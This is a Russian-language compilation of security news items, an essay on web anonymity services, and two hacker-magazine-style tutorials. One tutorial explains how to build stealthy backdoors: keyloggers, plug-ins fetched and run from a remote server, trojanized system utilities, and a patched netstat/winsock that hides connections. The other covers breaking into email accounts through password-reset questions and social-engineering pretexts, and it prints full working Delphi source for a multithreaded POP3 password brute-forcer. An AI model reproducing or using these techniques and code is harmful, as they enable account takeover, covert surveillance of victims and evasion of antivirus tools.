Саппорт

Действие поправок к «антипиратскому» закону будет распространяться на все виды интеллектуальной собственности. Глава российского государства Владимир Путин утвердил коррективы к «антипиратскому» закону, сообщает портал РБК. Действие поправок будет распространяться на все виды интеллектуальной собственности, в том числе на музыкальные и литературные произведения, а также программное обеспечение. Исключение составят только фотоснимки. За несоблюдение законодательных требований ресурсы-нарушители будут пожизненно заблокированы. . При этом в документе предусмотрена возможность досудебного решения разногласий интернет-ресурсов и владельцев авторских прав. Закон также предусматривает перманентное отключение web-сайта в случае двух проигрышей в судебных процессах по иску одного и того правообладателя. Подобные решения будет принимать Мосгорсуд. В этом случае судебная инстанция должна будет проинформировать о своем вердикте Роскомнадзор, а тот – потребовать у операторов связи в течение 24 часов заблокировать доступ к ресурсу, содержащему нелегальный контент. Также ведомство будет вносить злостных нарушителей в реестр. Пункт о перманентной блокировке вызвал наибольшее количество критики среди юристов и экспертов по авторскому праву. По мнению главного аналитика РАЭК Карена Казаряна, перманентная блокировка web-сайтов предоставляет владельцам авторских прав слишком большую власть над интернет-ресурсами. При этом откровенно пиратские порталы эта мера никак не заденет, поскольку они с легкостью могут «переехать» на «другой адрес». Изменения в закон начнут действовать с 1 мая 2015 года. 14 ноября текущего года Госдума РФ приняла законопроект во втором и третьем чтении. Совет Федерации ратифицировал документ 19 ноября.

Священнослужитель уверен, что высокая скорость современного интернета способствует созданию и распространению зла. Высокоскоростной интернет способствует распространению зла. По данным «Интерфакса», такое заявление сделал известный церковный деятель, митрополит Калужский и Боровский Климент. Митрополит считает, что высокоскоростной интернет способствует быстрому появлению и распространению «зла», поскольку для создания чего-то плохого не нужны определенные навыки или умения. Тем не менее, для того чтобы создать что-то полезное, потребуются значительные усилия, время и духовный настрой, даже с учетом современных технологий. Сам интернет митрополит не воспринимает в качестве воплощения зла. Он согласен с тем, что глобальная сеть – всего лишь технология хранения и передачи информации, наподобие глиняных табличек, папируса и прочих способов хранения данных. Митрополит Климент (в миру Герман Капалин) председательствует в Издательском совете РПЦ и является одним из постоянных членов Священного Синода. С 2005 года священнослужитель вошел в Общественную палату.

За последние четыре года преступники заработали более 25 млн рублей. Управление «К» МВД России задержало группу злоумышленников, сбывавших на потребительский рынок мобильные телефоны с предустановленным вредоносным ПО. Как сообщает «Росбалт», ссылаясь на пресс-центр МВД, шпионское ПО втайне от пользователя записывало его телефонные разговоры, перехватывало SMS-сообщения, переписки, а также фотографии и документы. Преступная группировка состояла из трех людей родом из Москвы, Йошкар-Олы и Республики Казахстан. Владельцем нелегального бизнеса был казах, который принимал заказы и организовывал встречи с клиентами, а также объяснял основы действия вредоносного ПО и способы его установки. Гражданин Йошкар-Олы занимался разработкой шпионского программного обеспечения, а также продвигал его в сети Интернет. Москвич исполнял обязанности курьера. На территории Центрального федерального округа группировка действовала более четырех лет, продавая вредоносное ПО своим клиентам, а также реализуя мобильные телефоны с предустановленными шпионскими программами. За это время было продано более 1000 телефонов, следящих за своими владельцами, а доходы преступников превысили 25 млн рублей. В настоящее время МВД ищет пользователей, купивших телефоны с предустановленным шпионским ПО. В отношении злоумышленников возбуждено уголовное дело по ст. 273 УК РФ.

Пользователям приложения предлагают деактивировать индикатор непрочитанных сообщений. Специалисты компании ESET обнаружили новый вид мошенничества, связанный с популярным мессенджером WhatsApp - абонентам приложения предлагают деактивировать индикатор непрочитанных сообщений. В ноябре этого года в мессенждере WhatsApp была реализована новая функция - индикатор непрочитанных сообщений. Одна серая пометка означает, что сообщение поступило на сервер программы, две - на мобильное устройство и двойная голубая свидетельствует о том, что окно чата открыто пользователем. Данная инновация пришлась по душе не всем поклонникам приложения, однако пока функцию отключить невозможно. Возмущением абонентов одного из самых популярных мессенджеров не преминули воспользоваться киберпреступники. Они размещают в социальных сетях сообщения с предложением деактивации индикатора. Для этого пользователям необходимо перейти по короткой ссылке и далее действовать согласно указаниям. Как сообщают эксперты ESET, одна из ссылок ведет на web-страницу с формой, на полях которой необходимо ввести номер мобильного телефона. Однако вместо отключения нежелательной функции пользователь оказывается подписанным на дорогостоящие SMS-сервисы. Короткие ссылки могут также перенаправлять абонентов на фишинговые ресурсы или порталы, содержащие вредоносное программное обеспечение.

В августе 98 года команда The Cult Of The Dead Cow выпустила пакет для удаленного администрирования – Back Orifice (BO). Честно говоря, я не очень обрадовался, когда услышал эту новость, так как я к этому времени уже писал «троянские кони». А после выхода BO люди все чаще и чаще стали задумываться о той опасности, которую несут в себе файлы неизвестного происхождения. Именно это помешало мне так же успешно продвигать свои творения несчастным юзерам – все теперь стали бдительными. Antiviral Toolkit Pro, самый популярный в России антивирусный пакет, теперь стоит практически у 80 процентов всего населения Рунета, и он знает все известные и кучу малоизвестных троянов. Так как же обмануть невинного пользователя сети и антивирусный пакет? Выбор составляющих backdoor Нет смысла говорить, что для добычи информации или доступа часто может понадобиться backdoor, который будет запущен там, где вам надо. Если выбран метод использования backdoor, то сразу же забудьте обо всех тех «неземных благах», которые несут в себе самые популярные трояны мира – BO, BO2K, NetBus Pro, Sub7, Donald Dick и прочие. Любой троян, про который знают более чем 5 человек, является неудачным. Помните, что самый эффективный троян, который может быть использован хакером – его личный троян, ну или, на крайний случай, тот, который написал хакерский друг-гуру. При составлении структуры трояна хакер должен забыть о всяких интересных и "полезных" вещах, таких как открывание cd-rom, выключение монитора, чат с жертвой. Backdoor нужен для того, что определяет его название – back door – незаметный проход, задняя дверь. Пишется он для того, чтобы получить доступ, манипулировать информацией, красть ее. Backdoor создается только для того, что нужно хакеру и ничего иного. В этом случае никакой антивирус не скажет про эту замечательную программу, что она backdoor. Мне понадобилось как-то узнать пароль root на одном UNIX. По стандартному методу мышления мне надо ломать саму машину, где стоит UNIX. Но она очень хорошо защищена, и это не так легко сделать, если вообще возможно. Но если вспомнить про человеческую незащищенность и социальную инженерию, то все UNIX-машины становятся доступны. Я сделал следующее: написал backdoor под Windows, который делал буквально следующее: он записывал все набранное на клавиатуре и давал доступ к диску. Все! Ничего лишнего. Получился этакий FTP-сервер с логой, того, что написано на компьютере. После этого я скачал все файлы с рабочей станции этого человека и взял логу того, что он писал. Этого оказалось достаточно, потому что там был аккаунт на UNIX-машину и пароль root. Его пароль был прописан в почтовом клиенте. А пароль root лежал в логе (когда он удаленно заходил на его сервер, он вводил этот пароль). В итоге была взломана машина UNIX. Хотя никакие стандартные методы проникновения замечены не были. Вывод: хакеру нужно думать более глобально, не ограничивать свое внимание только на объекте (жертве), а думать обо всех машинах в сети и о тех людях, которые сидят за этими машинами. Так вот, поэтому практически во многих ситуациях нам достаточно прочитать веб-сайт жертвы и написать backdoor. После этого, определить: к чему и для чего необходимо получить доступ. Если надо всего лишь скопировать всю информацию и то, что вводил пользователь с клавиатуры – можно ограничиться упрощенным FTP-сервером и кей-логгером. Мне этого хватит. Если есть желание постоянно наблюдать за жертвой, то можно встроить еще функцию screenshot, чтобы смотреть на экран жертве. Или же встроить поддержку socks-соединения, чтобы работать не напрямую, а через socks-сервер, таким образом обезопасить себя. Можно также обеспечить шифрование передаваемых данных и проверку паролем доступа к backdoor жертвы и добавить, если это необходимо, удаленное управление реестром. Plug-ins На начальном этапе жертве посылается только база. Такая база, которая вообще нечего не умеет. Но к ней можно подключиться и пристраивать плаг-ины. Можно это сделать в виде отдельных exe-файлов, а можно в виде dll. И в зависимости от того, что хакеру нужно на данном этапе, он подсоединяется к своему трояну-базе и вводит команду: скачать плаг-ин file manager, чтобы управлять файлами. Он качает и тут же устанавливает его, а хакер работает. Можно пойти еще дальше. В программу встраивается своеобразный скрипт, где прописано, чтобы в каждый четверг она скачивала определенный плаг-ин с какого-то URL, ставила и запускала его. Плаг-ин, совершив какую-либо работу и отослав результат своей работы хакеру на e-mail, удаляется. А взломщик, уже читая результат работы одного плаг-ина, перестраивает скрипт на тот лад, который ему необходим. При достаточном терпении можно очень долго манипулировать этой машиной и быть незамеченным. Ведь почему те юзеры, у которых не стоят антивирусы, догадываются о том, что с их компьютером что-то не так? Потому что злоумышленник часто бывает нетерпелив и поэтому перегружает машину жертвы так сильно, что это становится заметно невооруженным взглядом. Профессионалы терпеливы. Stealth-backdoors Теперь рассмотрим такую немаловажную вещь, как стелс-технологию. Заключается она в том, чтобы обмануть пользователя во время установки трояна и в тех случаях, когда юзер обнаружит троян и захочет его удалить. Мы не будем рассматривать такие принципы стелса, когда код трояна постоянно меняется, как в полиморфном вирусе. Я слышал, что разработчикам Donald Dick удалось сделать такое, но я в этом сомневаюсь. Реально полиморфного трояна создать нельзя. Создатели BO2K тоже во время разработки пытались сделать его полиморфным. Максимум, что им удалось – разбить троян на несколько частей. Итак, приступим. Возьмем небольшую программу, которая занимает от 15 до 35 килобайт в зависимости от языка и компилятора. Эта программа ничего не отсылает по почте и к ней нельзя подключиться. Это специально делается для того, чтобы обезопасить сохранность этой программы от злобных реверс-инженеров. При запуске, а лучше через неделю после запуска, она соединяется с прописанным в ней FTP- или WWW-сервером. Скачивает с него некую модифицированную программу (например, internat.exe - переключение кодировки) с встроенным троянцем. Я делал так: клал на FTP-сервер несколько версий этого internat: w95en.exe – w95 англ., w95ben.exe – w95 OSR2 англ., w95ru.exe – w95 рус., w95bru.exe – w95 OSR2 рус., w98en.exe – w98 англ., w98ru.exe – w98 рус., w98seen.exe – w98 SE англ., w98seru.exe - w98 SE рус., w2ken.exe – w2000 англ., w2kru.exe – w2000 рус. и качал соответствующий. После скачивания эта первоначальная программа заменяет родной internat программой, которая скачалась и удаляется. При перезагрузке он запускается как internat.exe, его даже видно в task list. Ни у кого нет подозрений. При этом порты он никакие не открывает, но раз в 30 минут принимает почту с определенного аккаунта, который в нем прописан. Если почта есть, он проверяет ее принадлежность к себе, если принадлежность обнаруживается, то он исполняет команды, которые там указаны. Например, запустить FTP-сервер или скачать программу из сети и ее запустить. Или удалиться. Или закачать лог-файл на FTP-сервер. Все, что угодно. Второй вариант такой. Небольшая программа (30-60 кб) при запуске соединяется с прописанным в ней FTP-сервером, скачивает с него некую модифицированную программу (например, internat.exe - переключение кодировки) со встроенным троянцем. При перезагрузке соединяется со специальным сервисом, который злоумышленник запускает на какой-нибудь UNIX-машине, ждет команд от него, и уже на тот сервер посылает свои команды. При этом на машине жертвы никак не смогут узнать, какой именно хакерский IP-адрес. Поэтому вычислить хакера будет крайне тяжело, только через промежуточный сервер. А если промежуточный сервер запускать на каком-нибудь сервере, который не играет для взломщика никакой роли (например, взломанный shell-box), то он в любой момент сможет удалить всю информацию на нем. И наконец, третий вариант. Небольшая программа (60 кб) при запуске соединяется с прописанным в ней FTP-сервером, скачивает с него полный комплект модифицированных программ, которые заменяют все стандартные утилиты (wordpad, internat, notepad, calc, image, write, explorer, scandisk, solitaire). При этом даже если кто-либо обнаружит, что-то в одной программе и заменит ее, будут работать другие. Желательно, чтобы в каждой из них был разный принцип работы (один через UNIX-box, другие через e-mail, третьи напрямую и т.д.). При этом, когда начинает работать другой, они шлют е-mail с извещением, каким образом ведет себя пользователь, и какие программы он запускает. Можно пойти дальше и заразить dll системы. В которых при вызове любой функции выполнялись бы и хакерские функции тоже. Сетевые соединения Как я борюсь с тем, что многие постоянно смотрят программой netstat свои текущие соединения? Все очень просто. В сети валяется исходник netstat, написанный на С. Нужно просто переписать его так, чтобы соединения с определенных адресов или на определенные порты не показывались. Можно пойти еще дальше. Взять и переписать dll winsock, т.к. существуют программы, которые показывают соединения, обращаясь напрямую к winsock. Исходный код winsock также можно легко найти в Сети.

Приватность и сбор персональных данных Обеспечение приватности человека, пользующегося широкими возможностями Интернета, и незаметный, но весьма интенсивный сбор данных, персонально идентифицирующих его личность, - это две очень серьезно конфликтующие друг с другом проблемы. Причем конфликт этот быстро становится одной из наиболее горячих тем как в развитии электронной коммерции, так и в более специфической области, деликатно именуемой "обеспечение нормальной работы правоохранительных органов". Занимающиеся маркетингом структуры постоянно изыскивают новые, все более эффективные пути для сбора максимально возможной информации о своих потенциальных покупателях. Для коммерции такие данные - удобное, а теперь и необходимое дополнение во всей той автоматизации, что предоставляется Интернетом. Уже вполне четко осознано, что с помощью Интернета намного легче собирать огромные объемы информации о потребителях, а взаимная увязка этих данных обеспечивает существенные прибыли в торговле. Однако защитники гражданских свобод вполне резонно усматривают в этих устремлениях покушение на фундаментальные права граждан, поскольку в подавляющем большинстве случаев информация о пользователях собирается без их согласия. Поэтому обеспечение анонимности пользователя Интернета и возможность использования псевдонимов в онлайновых коммуникациях рассматриваются как необходимые меры в защите и укреплении таких гражданских прав, как приватность и свобода слова. Службы анонимизации и их компрометация В последние годы в Интернете появился целый ряд служб, как бесплатно, так и за деньги предлагающих пользователям услугу "анонимизации". Другими словами, используя серверы этих служб как стартовую площадку для своих путешествий по Сети, пользователь получает гарантии, что все его персональные данные "срезаются", а посещаемые им веб-сайты получают в свое распоряжение лишь характеристики сервера-"анонимайзера". Среди десятков таких служб можно упомянуть наиболее известные: Anonymizer (www.anonymizer.com), проект компании Lucent под названием Private Web Access (www.bell-labs.com/project/lpwa), служба "Onion Router" Исследовательского центра ВМС США (www.onion-router.net), а также служба Aixs (http://aixs.net/aixs/). Но, как показало пристальное изучение возможностей этих служб, они не предоставляют той степени анонимности, которую декларируют. Соответствующее исследование было недавно проведено бостонским интернет-консультантом Ричардом Смитом (Richard M. Smith), который не стал разрабатывать никаких новых средств, а просто воспользовался известными инструментарием, который используют веб-серверы для идентификации своих посетителей. Смит продемонстрировал, что лишь этих инструментов, в сочетании с дефектами в популярных программах-браузерах Internet Explorer и Netscape Navigator, достаточно для компрометации служб анонимизации. Для организации тестирования Смит создал веб-сайт (www.tiac.net/users/smiths/anon/), котрый оборудовал соответствующими программами и разослал приглашения в компьютерные новостные группы. Для оценки степени защиты анонимности применялись шесть различных тестов, главным образом, использующие возможности языков Java, JavaScript и Active X. Реальные испытания показали, что все из четырех перечисленных выше служб анонимизации не смогли выдержать натиска и уступили по крайней мере одному из 6 тестов, пропустив и выдав реальный IP-адрес пользователя. По словам Смита, на всю эту демонстрацию ненадежности четырех наиболее авторитетных служб ушло меньше часа. "Сеть Свободы" Но вот теперь в Интернете появилась служба Freedom Network (www.freedom.net), созданная канадской компанией Zero Knowledge System и предлагающая качественно иную степень защиты анонимности пользователей. На разработку системы ушло около двух лет, и, как говорит о своем детище возглавляющий компанию Остин Хилл (Austin Hill): "Это инфраструктура, на которой будет строиться будущее. Мы рассматриваем нашу технологию как фундаментальную." Загружаемая с веб-сайта Freedom программа-клиент позволяет пользователям создавать для себя несколько псевдонимов, причем персональные данные не требуется хранить на каком-нибудь сервере третьей стороны. Вся информация, которой располагает предоставляющая услугу компания, - это данные кредитной карты, которой расплатились за услугу (50 долларов в год). Используя программу и псевдонимы (по желанию, разные для различных сетевых нужд), пользователь может путешествовать по Интернету с помощью цепи серверов, каждый из которых скрывает идентификатор пользователя и его "цифровые следы" при веб-серфинге, работе с электронной почтой, общении в новостных группах и чат-конференциях. Вся система имеет прочную криптографическую основу, поскольку в процессе пересылки пакеты с данными пользователя надежно шифруются. Зашифрованные пакеты пересылаются через множество серверов, которыми управляют провайдеры-партнеры для сокрытия маршрутов пакетов. По свидетельству сторонних экспертов, система freedom.net обеспечивает действительно мощную защиту анонимности. Как сказал Мадж (Mudge), один из лидеров известной бостонской группы хакеров L0pht, "здесь действительно делается то, что декларируется... и это весьма значительное достижение". Обеспокоенность органов Подобную степень защиты анонимности никакие трюки коммерческих веб-серверов, понятное дело, пробить не в силах. Более того, не на шутку переполошились правоохранительные и разведывательные органы Канады и США, усмотревшие в новой службе серьезную угрозу своей работе. Остин Хилл и его коллеги по Zero Knowledge получили уже множество приглашений в различные правительственные инстанции для разъяснения подробностей ими содеянного. В течение последних месяцев года им уже пришлось выступить с "презентацией своего продукта" перед представителями таких ведомств, как RCMP - "королевская конная полиция" (канадский аналог американского ФБР), CSE - Управление безопасности связи (аналог американской радиоразведывательной службы АНБ), CSIS - разведслужба (аналог ЦРУ). Была также неформальная встреча с сотрудниками Министерства юстиции США из подразделения по борьбе с компьютерными преступлениями. Поскольку в истории уже известны случаи, когда после подобных обработок компании радикально изменяли политику и ослабляли свои системы под нажимом властей, то в Интернет-сообществе зародилось естественное опасение относительно реальности дальнейшей стойкости "Сети Свободы". Однако Остин Хилл тут же предоставил общественности подробный отчет об имевшихся встречах с представителями властей и повторил те вещи, что рассказывал им. Суть дававшихся на презентациях разъяснений об особенностях технологии сводится к нескольким словам: "freedom.net вполне умышленно создавалась так, чтобы никому была недоступна любая информация о пользователе". По убеждению создателей системы, они не нарушают абсолютно никаких законов, в цифровой век предоставляя гражданам право на такую же анонимность в Сети, какую испокон веков предоставляли людям обычный лист бумаги и карандаш. В заключение же можно вспомнить высказывание одного известного адвоката по поводу того, что отличает свободное государство от тоталитарного. Вольно излагая его слова, в свободной стране у правоохранительных органов должны быть трудности с получением доступа к приватной информации граждан. Если же у органов нет никаких проблем с получением такого доступа, то это государство - фашистское.

Есть основные 4 способа взлома мыла. 1. Отсылка на атакуемое мыло сообщения, содержащего какой-то код, который после своего выполнения, позволит получить пароль или изменить его на нужный. Опять же, если мыло не соседа-собутыльника, а чего-то более серьезного, то письма получают не дырявым аутглюком и не експлорером, а почтовым клиентом с отключенным выполнением скриптов. Плюс еще их просматривают в диспетчере сообщений на предмет приатаченных файлов и на серваке стоит брандмауэр, который автоматом переименовывает все прикрепленные выполняемые файлы. Облом. Только засветиться. И ничего конкретно тут пообещать нельзя. 2. Ошибки web-интерфейса сервиса для работы с почтой. В частности, подмена запросов после авторизации на своем мыле так, чтобы вплыть в настройки чужого. Это все уже практически везде пофиксено. Останавливаться на этом не буду. 3. Взлом самого сервака с почтовым сервисом. Т.е. надо всесторонне изучить сервер, найти на нем дырки, найти бесплатный работающий эксплоит и т.д. и т.п. Дырок может и не быть или соответствующие эксплоиты платны или не выставленны на всеобщее обозрение. Тем более, если ты взломал сервер с серьезным мылом, то нафиг тебе за копейки продавать эту инфу. Если кто-то знает как им распорядиться, то имея сервак в кармане ты и сам можешь об этом догадаться. Или можно продавать информацию кусками, по мере ее поступления. В любом случае, обещание по поводу недели на взлом... 4. Брутфорс. Самый тупой способ. Перебор паролей по словарю или подряд всех символов. Остановимся более подробно на этом способе. Первое, что нужно для этого, это словарь. На этом же форуме я обнаружил еще одно очень веселое объявление о продаже файла, содержащего 360000 паролей. Файл паролей можно взять где угодно. Даже просто пойти и скачать какую-нибудь программу-переводчик. Теперь немного математики. Рассмотрим такой случай: пароль - не слово, а случайный набор маленьких английских символов. Для того, чтобы подобрать 2-ух буквенный пароль, по теории вероятности, надо 26*26/2=338 раз перебрать пароль. Для трехбуквенного - 26^3/2=8788, для четырехбуквенного - 26^4/2=228448 и т.д.. Тут, конечно, есть варианты. Можно сначала перебирать так: первая буква - гласная, вторая - согласная; первая - согласная, вторая - гласная. Но, если пароль состоит не только из маленьких английских букв, но и из больших, плюс цифры и спец-символы, то большой облом. Одно дело у себя локально на крутом компе подобрать пароль к excel-евскому документу, а другое дело по инету. Итак, мы определились, что прямой перебор не катит. При таком пароле, надо пробовать первые три способа. Немного о безопасности. Некоторые провайдеры делают мыло так, что получить его можно только выйдя в инет через них. Проверка может быть только на диапазон адресов и есть некоторая возможность для спуфинга, но... В общем, только третий способ. Ломать прова. Взломать его за неделю - это, мягко говоря, несколько опрометчивое высказывание. Или ты уже знаешь как и тогда это происходит за пару часов, или.... Рассмотрим перебор по словарю. Здесь есть несколько вариантов. Самый быстрый - задействовать свой полный шелл на быстром серваке. Есть несколько но : если обнаружат, то аккаунт прикроют. Ради призрачной вероятности заработать несколько денег, рисковать полным шеллом - это сильно круто и расточительно. Использовать прокси - тоже не выход. Можно использовать вариант с каким-то уже взломанным серваком, но см. выше. Его терять еще более обидно. Можно создать web-страницу c поддержкой запуска скриптов и повесить счетчик, который при каждом посещении будет перебирать несколько вариантов. Опять же, пагу могут и закрыть. Все усилия по ее раскрутке может зачеркнуть какой-то админ-мудак. Самый безопасный, но и самый ненадежный способ - накодить спец прогу и занести ее в компьютерный клуб. При работе с инетом, она будет перебирать по чуть-чуть пароли. Потом приходишь раз в ..., и смотришь результаты. Но эту прогу надо еще написать и замаскировать - в этом клубе админы могут полными идиотами и не быть. Ну и, самый распространенный способ - перебирать со своего компа. Есть целый ряд программ для этого, но все они мне, лично, не нравятся, и в этой статье я буду рассказывать, как написать брутфорсер самому. На самом деле, иногда, все не так уж и безнадежно. Рассмотрим несколько реальных примеров. Вернее, я оговорился - все примеры выдуманы, все имена изменены, и любые совпадения абсолютно случайны. Зеркало. Не люблю я спамеров. Вот интересный случай: прочитал я где-то объяву о том, что представитель этой масти может заплатить за спам лист, вытащенный из какого-то сервера. Мыло его было [email protected] Ломанулся я на www.glukr.net и сразу же нажал Забыл пароль . Служба борьбы с амнезией - очень интересная штука. Человек может указать очень сложный пароль, но правдиво, коротко и просто ответить на вопросы в интересующем нас разделе. Мне высветилось: Ответьте на вопрос: , sex , ясен пень - sex . Опа. Такая приятная табличка Установите новый пароль . Спамер остался без мыла. Для этого мне не понадобилось ничего, кроме моей любимой оперы и 2 минут времени. Идиотизм. Когда-то мне пришло письмо вроде бы от достаточно известной конторы, занимающейся безопасностью. Там было предложение заполнить резюме и выслать его на мыло с уже рассмотренного нами бесплатного, очень популярного, но такого дырявого glukr.net. Резюме было на 3- ех листах с просьбой указать ВСЮ информацию о себе. Я сразу заподозрил неладное. Или кто-то очень хотел получить обо мне всю инфу для каких-то своих черных замыслов и не имел ничего общего с этой конторой (что скорее всего), или в этой конторе есть очень умные люди (см. тему примера). На Забыл пароль у меня спросили рост. Введя пару значений, я обнаружил временную защиту, т.е. за определенный промежуток времени нельзя было вводить более двух вариантов. Рассудив, что карлик какой-то не будет отвечать на вопрос о росте, я начал со 180. Вводя по чуть-чуть цифры, к утру, я увидел такую родную сердцу табличку. Вместо того, чтобы ввести что-то типа 6 futov 1 дюйм + 2 litra пива , там было цифровое значение. Ничего я менять не стал, а то, вдруг действительно людей на работу берут, а я потопчусь своими кроссовками рибок 46-ого размера по большому и чистому.... Социальная инженерия. На некоторых серваках на вопрос Забыл пароль надо указать дату рождения и, например, любимое блюдо. Казалось бы, очень сложно, но.... Надо просто открыть мыло, например, [email protected] и послать с него открытку Поздравляю с днем рождения и какую-нибудь глупую подпись. Вполне возможно, что он ответит У меня не сегодня день рождения, а 32 марта . Или послать сообщение Мы разыгрываем 10000 видов на жительство у америкосов и Вас компьютер выбрал случайно. Укажите в обратном письме Ваше образование и дату рождения и ... . В общем, на первый взгляд, вполне безобидно. Вариантов много. Узнав его дату рождения, перебрать любимое блюдо - можно, но т.к. практически у всех есть временная защита, то тут, скорее всего, если сразу не угадал, тоже облом. Также может быть указано имя матери. Словарь из имен можно составить самому или взять на серваке с гороскопами по имени и прочей лабудой. Тут главное понять, что женских имен не так уж и много, и указывают их обычно не как лена или оля , а Елена или Ольга . Также следует учесть, что человеку иногда облом переключать раскладку и имя может быть в английской транскрипции. Глобальный поиск. Включить поиск по атакуемому мылу. Если это мыло присутствует на какой-нибудь доске объявлений или рассылке, то написать ему соответствующее сообщение (см. пример 3), исходя из полученных сведений. Также пароль в какой-нибудь форум или чат получить иногда гораздо легче, и в большинстве случаев он от пароля на мыло не отличается. Навороты web-сайта. На сервере одного прова обнаружил голосование, с просмотром результатов. Результаты вызывались через url, в котором указывался один из параметров - куда после этого перейти. С соответствующими правами. Гении программирования, мля. Там еще был дополнительный web-интерфейс для работы с почтой. В корень выйти не получилось, но сходив к ним, потратив несколько баксов на диалап и мыло, просканировав сервак на предмет установленного почтового сервиса и поэкспериментировав с купленным мылом, я понял, почему некоторые жаловались на то, что по 5-ти часовой карточке у них больше 2-ух часов не работаешь и кто-то периодически читает у этого прова все мыло. Но это тема отдельного разговора. Кстати, нужный мне пароль оказался qwerty . Обычно, первое слово в большинстве словарей. Рассмотрим способы защиты службы борьбы с амнезией. Первый - временная защита (кстати, на mail.xakep.ru я ее не обнаружил, хотя может не там смотрел). Второе - указывать любимое блюдо не Пиво и рост - не 215 . Таким образом, в большинстве случаев способ Забыл пароль не действует. Теперь рассмотрим вариант, при котором человек не должен догадываться, что его мыло читают, т.е. даже подбор Забыл пароль не катит. Перейдем непосредственно к исследованиям и кодингу. Я не буду рассматривать написание брутфорса на перл для работы на удаленном сервере - это есть на www.xakep.ru. Рассмотрим написание брутфорса на Delphi, с использованием функций WinAPI для работы с сокетом. Переписать на перл, си или асм потом проблем нет никаких - оно все отличается только синтаксисом вызова функций. Также потребуется какой-нибудь telnet-клиент, port-mapper или tcp-logger для исследования ответов сервера. POP3. 110 порт. Интересующие нас команды - user и pass . Предположим, что надо подобрать пароль на freemail.ukr.net у пользователя dndanil (это мой - специально для экспериментов). Ломанемся по телнету на freemail.ukr.net:110 и введем user dndanil . Потом pass password . Посмотрим ответы. Если после оценки скорости желание не отпало, то надо написать прогу, которая будет коннектится к серваку и перебирать пароли с отслеживанием ошибок. Прогу будем писать с учетом продвинутых технологий при создании различных сканеров - многопоточность, т.е. перебирать пароли будут сразу несколько процессов. Так, вроде, быстрей. Для этого надо ввести класс, описывающий наш процесс. Кол-во одновременно запущенных процессов зависит от железа и скорости соединения с инетом. Для перебора будем использовать файл с паролями, который загрузим в TStringList (список строк). Итак, создадим для наглядности окно и влепим туда кнопку Hack it :-) и ProgressBar с Win32. Вот исходники с комментариями брутфорсера для POP3-сервера: unit Unit1; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, ComCtrls, StdCtrls, WinSock; type TForm1 = class(TForm) Button1: TButton; ProgressBar1: TProgressBar; procedure Button1Click(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; // Описание процесса type TScan = class(TThread) sock2 : TSocket; addr:TSockAddrIn; WSAData : TWSAData; private procedure CScan; protected procedure Execute; override; end; var Form1: TForm1; // Массив процессов Sock : array[1..255] of TScan; Rez : boolean = false; // Кол-во запущенных процессов на данный момент I0 : Integer; // Номер текущего пароля I : Integer; // TStringList с паролями PassList : TStringList; const FilePass = 'pass.txt'; // Файл с паролями в каталоге проги ProcCount = 10; // кол-во процессов POP3serv = '212.42.64.13'; // POP3 server (отпингованый) User = 'dndanil'; implementation {$R *.DFM} procedure TForm1.FormCreate(Sender: TObject); begin PassList:=TStringList.Create; end; // Запуск / Остановка procedure TForm1.Button1Click(Sender: TObject); begin if Rez then Rez:=false else begin // Открытие и загрузка файла паролей try PassList.Clear; PassList.LoadFromFile(FilePass); except end; if PassList.Count<=0 then begin Application.MessageBox('Файл паролей не найден или его нельзя использовать','ERROR',mb_Ok); exit; end; Form1.Button1.Caption:='Stop'; Form1.ProgressBar1.Position:=0; // Кол-во паролей Form1.ProgressBar1.Max:=PassList.Count; Application.ProcessMessages; I:=0; I0:=1; Rez:=true; // Запустить все процессы while true do begin Sock[i0]:=TScan.Create(false); inc(I0); // Подсчитать их кол-во //Выйти если больше указанного, или стоп, или подобрали if (I0>ProcCount)or(not Rez) then break; end; end; end; // Проца инициализации процесса procedure TScan.Execute; begin try // Запуск цикла while true do begin CScan; //Выход, если подобрали или закончился словарь if (not Rez)or(I>=PassList.Count) then break; end; except end; dec(I0); try Terminate; except end; //Если все процессы прерваны - if I0<=1 then begin Form1.Button1.Caption:='Hack it'; Rez:=false; Application.ProcessMessages; end; end; //Проца сканирования procedure TScan.CScan; var iaddr, x, I2 : Integer; Buf : array [1..255] of Char; //Отправка procedure sender(str:string); var I1 :integer; begin for I1:=1 to Length(str) do if send(sock2, str[i1] , 1, 0) = SOCKET_ERROR then exit; end; begin I2:=I; inc(I); Form1.ProgressBar1.Position:=I2+1; Application.ProcessMessages; try // Инициализация сокета WSAStartUp(257, WSAData); sock2:=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); if sock2=INVALID_SOCKET then begin try closesocket(sock2); except end; exit; end; //Адрес сервака iaddr := inet_addr(PChar(POP3serv)); if iaddr <=0 then begin try closesocket(sock2); except end; exit; end; addr.sin_family := AF_INET; // Порт сервака addr.sin_port := htons(110); addr.sin_addr.S_addr:=iaddr; if (connect(sock2, addr, sizeof(addr))) >0 then begin try closesocket(sock2); except end; exit; end; //Получение при соединении x:=recv(sock2,buf,sizeof(Buf),0); if (x=SOCKET_ERROR)or(buf[1]<>'+') then exit; // user user sender('user '+User+#13+#10); x:=recv(sock2,buf,sizeof(Buf),0); if (x=SOCKET_ERROR)or(buf[1]<>'+') then exit; // pass password sender('pass '+PassList.Strings[i2]+#13+#10); x:=recv(sock2,buf,sizeof(Buf),0); //Если подобралось if (x>3)and(buf[1]='+') then begin Rez:=false; Application.MessageBox(PChar('Pass = '+PassList.Strings[i2]),'ENJOY',mb_Ok); exit; end; try closesocket(sock2); except end; except end; end; end. Адрес сервака перед использованием надо отпинговать (ping -a freemail.ukr.net) и ввести IP. Кол-во процессов подбирается исходя из железа. Это рабочий скелет брутфорсера, хоть и написан за пару часов. При проверке, я создал файл-словарь, размером 1000 паролей и 666-ым шел мой настоящий пароль. При одном процессе я задолбался ждать. При кол-ве процессов 255, уже через 15 минут (на диалап), мне высветился мой пароль. На шелле, аналогичная конструкция на перл, заняла примерно столько же времени. Но это на 666-ом пароле, а на 1000000-ом я бы ждал очень долго. Поэтому этот способ обладает очень призрачными шансами что-либо подобрать и годится только для очень простых паролей. P.S. Статья и программа предоставлена в целях обучения и вся ответственность за использование ложится на твои хилые плечи.

